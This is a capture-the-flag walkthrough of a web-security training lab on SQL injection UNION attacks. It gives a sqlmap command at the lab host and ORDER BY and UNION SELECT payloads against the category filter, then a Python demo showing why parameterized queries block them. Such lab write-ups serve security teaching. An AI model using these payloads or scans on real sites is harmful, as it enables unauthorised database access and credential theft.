INFO Lab :
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you need to combine some of the techniques you learned in previous labs.
The database contains a different table called users, with columns called username and password.
GOAL : →
To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.
Solution :
This lab combines several techniques from the previous labs, so we will work through them in turn to reach the goal.
Let’s Hack 👿
sqlmap -u "https://0ac5002503b575518088a8aa00d20007.web-security-academy.net/filter?category=Gifts" --level=5 --risk=3

Here we go: we now know the type of DB is PostgreSQL.
' ORDER BY 1,2-- → 200 OK
# If we try 1,2,3 we get a 500 Internal Server Error, so we know the query has just 2 columns.
After that, we need to check that we can retrieve data.
' UNION SELECT NULL,NULL-- → we got 200 OK
OK, let's put any string in a column and see whether that string is reflected in the page.
' UNION SELECT NULL,'hacker'--
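Why these probes behave the way they do, and why binding the category as a parameter stops all of them, shown as an added example that is not part of the original write-up or the lab's code. It assumes a hypothetical `products` table and uses in-memory SQLite as a stand-in for the lab's PostgreSQL backend; the function names are made up for illustration.

```python
import sqlite3

# Constructed sample data; SQLite in memory stands in for the lab's PostgreSQL backend.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (name TEXT, description TEXT, category TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?, ?)", [
        ("Gift card", "Any amount", "Gifts"),
        ("Snow globe", "Shake it", "Gifts"),
        ("Desk lamp", "LED", "Office"),
    ])
    return db

def filter_vulnerable(db, category):
    # Input is concatenated into the SQL text, so a quote ends the string
    # literal and the rest of the input is parsed as SQL.
    sql = "SELECT name, description FROM products WHERE category = '" + category + "'"
    return db.execute(sql).fetchall()

def filter_parameterized(db, category):
    # Input is bound as a value; it is only ever compared against the column.
    sql = "SELECT name, description FROM products WHERE category = ?"
    return db.execute(sql, (category,)).fetchall()

def probe(fn, db, category):
    """Return ('ok', rows) or ('error', message), mirroring the 200 / 500 responses."""
    try:
        return ("ok", fn(db, category))
    except sqlite3.Error as exc:
        return ("error", str(exc))

# The category values used in the write-up, plus one legitimate value.
PAYLOADS = [
    "Gifts",
    "' ORDER BY 1,2--",
    "' ORDER BY 1,2,3--",
    "' UNION SELECT NULL,NULL--",
    "' UNION SELECT NULL,'hacker'--",
]

if __name__ == "__main__":
    db = make_db()
    for p in PAYLOADS:
        print(repr(p))
        print("  concatenated :", probe(filter_vulnerable, db, p))
        print("  parameterized:", probe(filter_parameterized, db, p))
```

With the concatenated query, the third ORDER BY term raises a database error (the 500 seen above) and the UNION row carrying the marker string comes back in the result set; with the bound parameter every probe is just a category name that matches nothing.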
